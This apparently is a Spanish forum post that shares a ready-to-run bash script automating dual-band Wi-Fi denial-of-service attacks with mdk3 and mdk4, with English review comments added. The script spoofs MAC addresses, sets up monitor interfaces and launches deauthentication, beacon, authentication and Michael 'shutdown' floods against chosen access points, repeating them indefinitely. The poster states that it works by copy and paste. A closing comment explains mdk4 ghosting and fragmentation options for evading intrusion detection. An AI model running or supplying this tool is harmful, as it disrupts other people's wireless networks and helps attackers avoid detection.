salu2
Atención: si el script termina mal, devuelve la interfaz a su estado normal con estos pasos:
airmon-ng (verificamos qué interfaz en modo monitor tenemos)
iw interfazmon del
ifconfig interfaz down
macchanger -p interfaz
ifconfig interfaz up
Fíjate en que la detección del cambio de canal se hace por medio de iw,
al igual que el poner las interfaces en modo monitor: también uso iw.
Además uso un archivo awk, que hice a partir de trozos de otros, que presenta en pantalla las redes disponibles; con awk todo se hace más sencillo.
Para esto, como he dicho, hacen falta 2 tarjetas, una de ellas compatible con 5 GHz.
#!/bin/bash
###########################################################################
################ Ddoos atomatic dual band Wlan ############################
############### Based; Apfuker.py and Dos Koala ###########################
###########################################################################
# ANSI colour escape sequences. They are stored as literal backslash text and
# only turn into real escapes when printed with `echo -e`.
# Note: the script also expands $blue, $rojo and $colorbase, which are not
# defined here, so those expand to nothing.
verde='\033[1;32m'     # bold green
amarillo='\033[1;33m'  # bold yellow
azul='\033[1;34m'      # bold blue
rojoC='\033[1;31m'     # bold red
grisC='\033[0;37m'     # light grey
############################
# f_empieza: first stage of the script. Creates the working directory, writes
# the awk scan parser, stops network management, prepares the interface chosen
# for the 5 GHz band (MAC change + monitor-mode virtual interface), shows a
# scan listing and prompts the operator for the 5 GHz ESSID, channel and BSSID.
# It ends by calling f_floodinterface.
# Globals written: Ddoos0, Ddoss, interfaces, interface_5ghz, essid5GHZ,
#                  canal5GHZ, BSSIDghz5, blacklist_5ghz
f_empieza() {
# NOTE(review): fixed, predictable directory under world-writable /tmp, created
# while the script runs as root (see the id -u check at the end of the file).
# The mkdir result is not checked, so a directory that already exists there is
# used as-is.
mkdir /tmp/Ddoss
Ddoos0="/tmp"
Ddoss="/tmp/Ddoss"
# Store this shell's PID; nothing in the visible script reads the file back.
echo $$ >$Ddoss/terminal.pid
sleep 2 ;
# Write an awk program to /tmp/Ddoss/scan.awk. The program reads `iw ... scan`
# output: a "BSS" line sets the current MAC (upper-cased), an "SSID:" line
# stores the network name, a "DS" line stores field 5 as the channel, and the
# END block prints one "MAC  SSID  Ch" row per network. It relies on
# gawk-style arrays of arrays (wifi[MAC]["SSID"]).
echo "
\$1 ~ /^BSS/ {
if(\$2 !~ /Load:/) {
gsub(\"(\\\(.*)\", \"\", \$2)
MAC = toupper(\$2)
wifi[MAC][\"enc\"] = \"OPEN\"
}
}
\$1 == \"SSID:\" {
FS=\" \"
\$0=\$0
sub(\" \", \"\", \$2)
wifi[MAC][\"SSID\"] = \$2
FS=\" \"
\$0=\$0
}
\$1 == \"DS\" {
wifi[MAC][\"Ch\"] = \$5
}
END {
for (w in wifi) {
printf \"%-20s\t%s\t%s\n\", w, wifi[w][\"SSID\"], wifi[w][\"Ch\"]
}
}
"> "/tmp/Ddoss/scan.awk"
sleep 2 ;
# Invokes `service` with the arguments "stop networkmanager", then lets
# airmon-ng terminate processes that interfere with monitor mode. Host-side
# effect: normal network connectivity is dropped until the cleanup handler runs.
service stop networkmanager
sleep 2 ;
airmon-ng check kill
echo -e "\e[1;32m #############################\e[0m"
echo -e "$verde # "$azul"Ddoos Automatic dual band$verde #"
echo -e "\e[1;32m #############################\e[0m"
echo
# $blue is not defined in the visible script (the colour variable is azul), so
# it expands to nothing here.
echo -e $blue " Seleciona interfaz para ataquar banda 5ghz :"
echo -e $amarillo
# Build the menu from `ip link`: every interface name except those matching
# "lo" or "eth".
interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'}|grep -v lo|grep -v eth*`
select interface_5ghz in $interfaces; do
break;
done
echo -e "\e[1;32m\e[0m"
# Take the interface down, set a hard-coded MAC address on it, bring it back
# up, and add a monitor-mode virtual interface named "<iface>mon".
# Defender note: the MAC value is a constant in this listing, so an unmodified
# copy of the script would presumably present the same address each run.
ifconfig ${interface_5ghz} down
sleep 2 ;
macchanger -m c0:1b:88:a1:0a:83 ${interface_5ghz}
sleep 2 ;
ifconfig ${interface_5ghz} up
sleep 2 ;
iw ${interface_5ghz} interface add ${interface_5ghz}mon type monitor
sleep 2 ;
echo -e "\e[1;32m --Vamos a scanear redes 10 seg.--\e[0m"
# Scan with iw, run the output through scan.awk and save the table.
sudo iw ${interface_5ghz} scan | awk -f $Ddoss/scan.awk > $Ddoss/Redes-Disponibles.txt
sleep 10 ;
echo -e "\e[1;32m___________________________________________\e[0m"
echo -e $azul
cat $Ddoss/Redes-Disponibles.txt
echo -e "\e[1;32m___________________________________________\e[0m"
# Prompt until a non-empty 5 GHz network name is typed; no further validation.
unset essid5GHZ
while [ -z "${essid5GHZ}" ]; do read -p " Nombre de la Red 5GHz " essid5GHZ; done
echo -e "\e[1;34m[*]\e[0m OK"
sleep 2;
# Prompt for the 5 GHz channel and accept 1..173.
# NOTE(review): (( )) evaluates the typed text as an arithmetic expression;
# nothing restricts it to digits before it is evaluated.
unset canal5GHZ
while [ -z "$canal5GHZ" ]; do read -p " Canal de 5ghz :" canal5GHZ; done
if (($canal5GHZ >= 1 && $canal5GHZ <= 173)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: invalid channel !\n"
sleep 2;
#iw dev ${int} set channel $canal
# On an out-of-range value the flow jumps to f_floodinterface rather than
# asking for the channel again.
f_floodinterface
fi
# Prompt until a non-empty 5 GHz BSSID is typed. Unlike the 2.4 GHz prompt in
# f_floodinterface, the format is not checked here.
unset BSSIDghz5
while [ -z "${BSSIDghz5}" ]; do read -p " MAC o BSSID para 5GHz: " BSSIDghz5; done
echo -e "\e[1;34m[*]\e[0m OK"
#iw dev ${int1} set channel ${canal5GHZ}
sleep 2;
# Save the BSSID to a one-line file whose path is kept in blacklist_5ghz.
echo "$BSSIDghz5" > $Ddoss/blacklist-5ghz.txt
blacklist_5ghz=$Ddoss/blacklist-5ghz.txt
f_floodinterface
}
################################################################
# f_floodinterface: second stage. Prepares the interface chosen for the 2.4 GHz
# band (random MAC + monitor-mode virtual interface), shows the saved scan
# table again and prompts for the 2.4 GHz ESSID, channel, re-check interval and
# BSSID. It ends by calling f_floodinstantane.
# Globals read:    Ddoss, amarillo, azul
# Globals written: interface2, interface_2ghz, ESSID, canal, seconde, BSSID,
#                  blacklist2
f_floodinterface(){
# function that asks the user for the information
echo
echo
echo -e "\e[1;32m Selecciona Interfaz para Ataque 2.4ghz\e[0m"
echo -e $amarillo
# Same interface listing as in f_empieza: names from `ip link` excluding those
# matching "lo" or "eth".
interface2=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 | awk {'print $1'}|grep -v lo|grep -v eth*`
select interface_2ghz in $interface2; do
break;
done
echo -e "\e[1;32m \e[0m"
# Take the interface down, give it a random MAC address (macchanger -r), and
# bring it back up.
ifconfig ${interface_2ghz} down
sleep 2 ;
macchanger -r ${interface_2ghz}
sleep 2 ;
ifconfig ${interface_2ghz} up
sleep 2 ;
# Start Fake Ap interface
iw ${interface_2ghz} interface add ${interface_2ghz}mon type monitor
# NOTE(review): this is not a valid shell assignment (the left-hand side is an
# expansion, not a variable name), so bash runs the expanded text as a command
# name. The rest of the visible script keeps using "${interface_2ghz}mon".
${interface_2ghz}mon=mon_2g
echo -e "\e[1;32m___________________________________________\e[0m"
echo -e $azul
cat $Ddoss/Redes-Disponibles.txt
echo -e "\e[1;32m___________________________________________\e[0m"
echo
# Prompt until a non-empty 2.4 GHz network name is typed; no further validation.
unset ESSID
while [ -z "${ESSID}" ]; do read -p " Nombre de AP 2.4ghz :" ESSID; done
echo -e "\e[1;34m[*]\e[0m OK"
# Prompt for the 2.4 GHz channel and accept 1..13; any other value prints an
# error and restarts this function from the top.
# NOTE(review): (( )) evaluates the typed text as an arithmetic expression;
# nothing restricts it to digits before it is evaluated.
unset canal
while [ -z "$canal" ]; do read -p " Canal de 2.4ghz :" canal; done
if (($canal >= 1 && $canal <= 13)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: invalid channel !\n"
sleep 2;
#iw dev ${int} set channel $canal
f_floodinterface
fi
# Prompt for the number of seconds between channel re-checks; accepted range is
# 120..259200 (259200 s = 72 h). Other values restart this function.
unset seconde
while [ -z "$seconde" ]; do read -p " Tiempo antes de checkear el canal del AP en seg(debe ser mas 120.): " seconde; done
if (($seconde >= 120 && $seconde <= 259200)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: tu tiempo no es corecto !\n"
sleep 4;
f_floodinterface
fi
# Prompt for the 2.4 GHz BSSID and repeat until it matches six colon-separated
# hex byte pairs. This is the only operator input in the script that is checked
# against a format.
read -ep " BSSID de AP 2.4ghz : " BSSID
echo " "
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do
# $rojo and $colorbase are not defined in the visible script and expand to
# nothing.
echo -e " $rojo Erreur : BSSID no valid $colorbase"
echo " "
read -ep " BSSID of target network : " BSSID
echo " "
done
# Save the BSSID to a one-line file whose path is kept in blacklist2.
echo "$BSSID" > $Ddoss/blacklist2.txt
blacklist2=$Ddoss/blacklist2.txt
f_floodinstantane # once the information has been collected, go on to loop 1, which is the f_floodinstantane function (see further down)
}
##################################
# f_checkap: periodic re-check, called from the loop at the end of
# f_floodinstantane. Stops the five background processes, deletes their PID
# files and the saved scan table, waits, reassigns the two channel variables
# from fresh `iw scan` runs, and then calls f_floodinstantane again.
# Globals read:    Ddoss, amarillo, interface_5ghz, interface_2ghz, BSSIDghz5,
#                  BSSID
# Globals written: canal5GHZ, canal
# NOTE(review): f_floodinstantane calls this function and this function calls
# f_floodinstantane, so every cycle nests one level deeper; neither call
# returns while the script keeps running.
f_checkap(){
echo -e $amarillo " !Parando ataque para verificar bien el cambio de canal¡"
# Each PID file was written by f_floodinstantane from $! of a background xterm.
# NOTE(review): the PIDs are read back from files in a fixed /tmp directory and
# passed unquoted to kill while running as root; a missing or altered file
# changes what kill receives.
kill `cat $Ddoss/mdk3.pid`
kill `cat $Ddoss/beacon-flood.pid`
kill `cat $Ddoss/auth-dos.pid`
kill `cat $Ddoss/flood-amok.pid`
kill `cat $Ddoss/michael-shoutdown.pid`
##################################
rm -rf $Ddoss/mdk3.pid
rm -rf $Ddoss/beacon-flood.pid
rm -rf $Ddoss/auth-dos.pid
rm -rf $Ddoss/flood-amok.pid
rm -rf $Ddoss/michael-shoutdown.pid
rm -rf $Ddoss/Redes-Disponibles.txt
# The message announces 30 seconds; the three `sleep 10` calls below add up to
# that.
echo -e $amarillo " !Esperemos 30 seg. volvemos a scanear redes para verficar canales¡"
sleep 10 ;
# Reassign canal5GHZ from a scan on the 5 GHz interface, filtered by the stored
# 5 GHz BSSID and reduced to the third column of scan.awk's output.
# NOTE(review): whether this pipeline and the next one yield the intended
# channel values has not been verified here.
canal5GHZ=`iw ${interface_5ghz} scan | awk -f $Ddoss/scan.awk | grep "$BSSIDghz5" | awk '{print $3}' | grep "."` > "$Ddoss/Redes-Disponibles.txt"
sleep 10 ;
# Reassign canal the same way for the 2.4 GHz interface and BSSID.
canal=`iw ${interface_2ghz} scan | awk -f $Ddoss/scan.awk |grep "$BSSID" "$Ddoss/Redes-Disponibles.txt" | awk '{print $3}' | grep "."`
sleep 10 ;
f_floodinstantane
}
###################################
# f_floodinstantane: starts five xterm windows, one mdk3 process on the 2.4 GHz
# monitor interface and four mdk4 processes on the 5 GHz monitor interface,
# records each xterm's PID under $Ddoss, and then loops forever: sleep
# $seconde seconds, call f_checkap.
# Globals read: Ddoss, interface_2ghz, interface_5ghz, blacklist2,
#               blacklist_5ghz, canal, canal5GHZ, ESSID, BSSID, essid5GHZ,
#               BSSIDghz5, seconde, verde, azul, rojoC
#
# Defender's view: the modes named in the messages below (deauthentication
# flood, beacon flood, authentication DoS, Michael "shutdown") all work by
# injecting 802.11 management/authentication traffic. Deauthentication and
# disassociation floods are mitigated by Protected Management Frames (802.11w,
# mandatory in WPA3). Michael is TKIP's integrity check, so that mode is only
# relevant where TKIP is still enabled. Beacon and authentication floods are
# typically visible to a WIDS/WIPS as abnormal management-frame rates.
f_floodinstantane(){
echo -e "\e[1;32m #############################\e[0m"
echo -e "$verde # "$azul"Ddoos Automatic dual band$verde #"
echo -e "\e[1;32m #############################\e[0m"
# loop 1, which tests the content of the file by calling the loop-2 function every x seconds (the function just above, f_checkap)
echo -e "Iniciando el DoS..(El Cambio de Canal sera Verficado en el Tiempo Ingresado)"
echo -e $rojoC"Parar el ataque Ctrl+C"
sleep 1;
# mdk3, mode d, on the 2.4 GHz monitor interface, given the 2.4 GHz BSSID file
# and channel. $! is the PID of the background xterm; it is saved so that
# f_checkap can kill it later.
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 ${interface_2ghz}mon d -b $blacklist2 -c ${canal} -s 1024 &> /dev/null &
echo $! >$Ddoss/mdk3.pid
echo -e $verde "Lanzando MDK3 $azul${ESSID} $verde| $azul${BSSID} $verde| $azul${canal} $verde|"
sleep 10;
# mdk4, mode b (announced below as the beacon flood), on the 5 GHz monitor
# interface with the 5 GHz ESSID and channel.
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon b -n ${essid5GHZ} -b g -w t -m -c ${canal5GHZ} &> /dev/null &
echo $! >$Ddoss/beacon-flood.pid
echo -e "Launching beacon flood $azul${essid5GHZ} $verde| $azul$BSSIDghz5 $verde| $azul${canal5GHZ} $verde|"
sleep 2;
# mdk4, mode a (announced below as the Auth DoS), against the 5 GHz BSSID.
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon a -i ${BSSIDghz5} -m -s 1024 &> /dev/null &
echo $! >$Ddoss/auth-dos.pid
echo -e "Launching Auth DoS against | $azul${BSSIDghz5} $verde|"
sleep 2;
# mdk4, mode d (announced below as "Deauth Flood Amok"), with the 5 GHz
# channel, BSSID file and ESSID.
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon d -c ${canal5GHZ} -b $blacklist_5ghz -E ${essid5GHZ} -s 1024 -x &> /dev/null &
echo $! >$Ddoss/flood-amok.pid
echo -e "Launching Deauth Flood Amok | $azul${BSSIDghz5} $verde| $azul${canal5GHZ} $verde|"
sleep 2 ;
# mdk4, mode m (announced below as the Michael 'Shutdown' exploitation),
# against the 5 GHz BSSID.
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon m -t ${BSSIDghz5} -j -w 1 -n 1024 -s 1024 &> /dev/null &
echo $! >$Ddoss/michael-shoutdown.pid
echo -e "Launching Michael 'Shutdown' Exploitation | $azul${BSSIDghz5} $verde|"
sleep 2 ;
# Endless loop: wait the operator-chosen interval, then hand over to f_checkap.
# Only the SIGINT trap (f_checkexit) ends the script.
while : ; do
sleep ${seconde} ; f_checkap ; done
}
#####################################################
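# Run the cleanup handler on Ctrl+C (SIGINT) so the host is not left with
# monitor-mode interfaces, changed MAC addresses and network management stopped.
trap f_checkexit SIGINT

#######################################
# Undo the changes made to one wireless interface: delete its "<iface>mon"
# monitor interface, take the interface down, restore its permanent MAC
# address (macchanger -p) and bring it back up.
# Arguments: $1 - base interface name; may be empty if none was selected
# Outputs:   "Interfaz no encontrada" on stdout when $1 is empty
#######################################
_f_restaura_interfaz() {
  local iface=$1

  if [ -z "$iface" ]; then
    # The original printed this once per step; a single notice is enough.
    echo -e "Interfaz no encontrada"
    return 0
  fi

  # Names are quoted so an unexpected value cannot be split into extra
  # arguments for commands that run as root.
  iw "${iface}mon" del
  sleep 2
  ifconfig "$iface" down
  sleep 2
  macchanger -p "$iface"
  sleep 2
  ifconfig "$iface" up
  sleep 2
}

#######################################
# SIGINT handler: restore both interfaces, restart network management, remove
# the working directory and exit.
# Globals: interface_2ghz, interface_5ghz, amarillo (read)
#######################################
f_checkexit() {
  echo -e "$amarillo" " !ESPERA VAMOS A LIMPIAR¡"

  _f_restaura_interfaz "${interface_2ghz}"
  _f_restaura_interfaz "${interface_5ghz}"

  # service(8) takes the service name first and the action second; the
  # original had them the other way round.
  # NOTE(review): the service name is kept as written on the page; on many
  # distributions the unit is named differently (e.g. NetworkManager) —
  # confirm for the system in use.
  service networkmanager start

  # The original did `cd /tmp/Ddoss` without checking the result and then ran
  # `rm -rf *.pid *.txt *.log`; had the cd failed, those globs would have been
  # expanded in whatever directory the root shell was in. Removing the
  # directory by its absolute path covers the same files without that risk.
  rm -rf -- /tmp/Ddoss

  echo -e "\e[1;32m TERMINADO DE LIMPIAR Y LENAVATAR INTERFACES...\e[0m"
  exit
}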
# f_activedos: one-entry text menu. Typing "1" unsets the `clean` flag and
# starts f_empieza; any other input shows the menu again.
# Nothing in the visible script calls this function; the entry point at the
# bottom of the file invokes f_empieza directly.
f_activedos() {
  clear
  echo "1. Dos"
  read -p "Choix: " menuchoix
  if [[ ${menuchoix} == 1 ]]; then
    unset clean
    f_empieza
  else
    f_activedos
  fi
}
# Entry point. Everything the script does (interface reconfiguration, MAC
# changes, stopping network management) needs root, so a non-root caller gets
# an error on stderr and exit status 1. As root, the `clean` flag is set and
# the first stage, f_empieza, is started.
if [ "$(id -u)" = "0" ]; then
  clean=1
  f_empieza
else
  echo -e "\e[1;31m[!]\e[0m No tienes permisos ...!" 1>&2
  exit 1
fi
con un copia y pega se puede usar
----------
estoy con esto en mdk4 bueno yo para mi si se usarlo pero claro aqui ya va potencia de antena y señal
--ghost <period>,<max_rate>,<min_txpower> after your attack mode identifier to enable ghosting!
<period> : How often (in ms) to switch rate/power
<max_rate> : Maximum Bitrate to use in MBit
<min_txpower> : Minimum TX power in dBm to use
-------------------------------
--frag <min_frags>,<max_frags>,<percent> after your attack mode identifier to fragment all outgoing packets, possibly avoiding lots of IDS!
<min_frags> : Minimum fragments to split packets into
<max_frags> : Maximum amount of fragments to create
<percent> : Percantage of packets
yo le tiro y mdk4 no se queja es poner despues de la eleccion del tipo de ataque el ghost y los frag de paquets de reenvio